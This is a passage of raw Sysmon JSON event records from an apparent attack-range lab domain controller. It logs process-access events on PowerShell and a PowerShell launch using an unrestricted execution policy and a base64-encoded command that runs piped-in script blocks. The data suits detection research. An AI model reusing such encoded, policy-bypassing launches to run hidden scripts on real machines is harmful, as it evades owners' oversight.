C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.468","SourceProcessGUID":"{A837DB8D-032A-5F25-0000-001044BF0900}","SourceProcessId":"4892","SourceThreadId":"4592","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-001045CE0900}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5099,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.484\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.484","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-001045CE0900}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5100,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.500\r\nProcessGuid: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nProcessId: 2776\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0isjridb.hy0.ps1\r\nCreationUtcTime: 2020-08-01 05:52:42.500","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.500","ProcessGuid":"{A837DB8D-032A-5F25-0000-001045CE0900}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0isjridb.hy0.ps1","CreationUtcTime":"2020-08-01 05:52:42.500","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5101,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.531\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.531","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-001045CE0900}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5102,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.531\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.531","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-032A-5F25-0000-001045CE0900}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5103,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.593","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5104,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.599\r\nProcessGuid: {A837DB8D-032A-5F25-0000-0010ECD90900}\r\nProcessId: 4188\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-032A-5F25-0000-002094BE0900}\r\nLogonId: 0x9BE94\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nParentProcessId: 2776\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:42.599","ProcessGuid":"{A837DB8D-032A-5F25-0000-0010ECD90900}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-032A-5F25-0000-002094BE0900}","LogonId":"0x9be94","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{A837DB8D-032A-5F25-0000-001045CE0900}","ParentProcessId":"2776","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","EventReceivedTime":"2020-08-01 05:52:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:42","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5105,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:42.593\r\nSourceProcessGUID: {A837DB8D-032A-5F25-0000-001045CE0900}\r\nSourceProcessId: 2776\r\nSourceThreadId: 5084\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-032A-5F25-0000-0010ECD90900}\r\nTargetProcessId: 4188\r\nTargetImage: C:\\Windows\\system32\\chcp.com\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13bf3779(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13094853(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13094524(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13b45939(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+130550ba(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+130b3589(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13096bee(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13096bee(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13096a7f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13088a04(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13094f37(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13094b2a(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13094853(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13094524(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+13b45939(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1307b385(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+1307a955(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 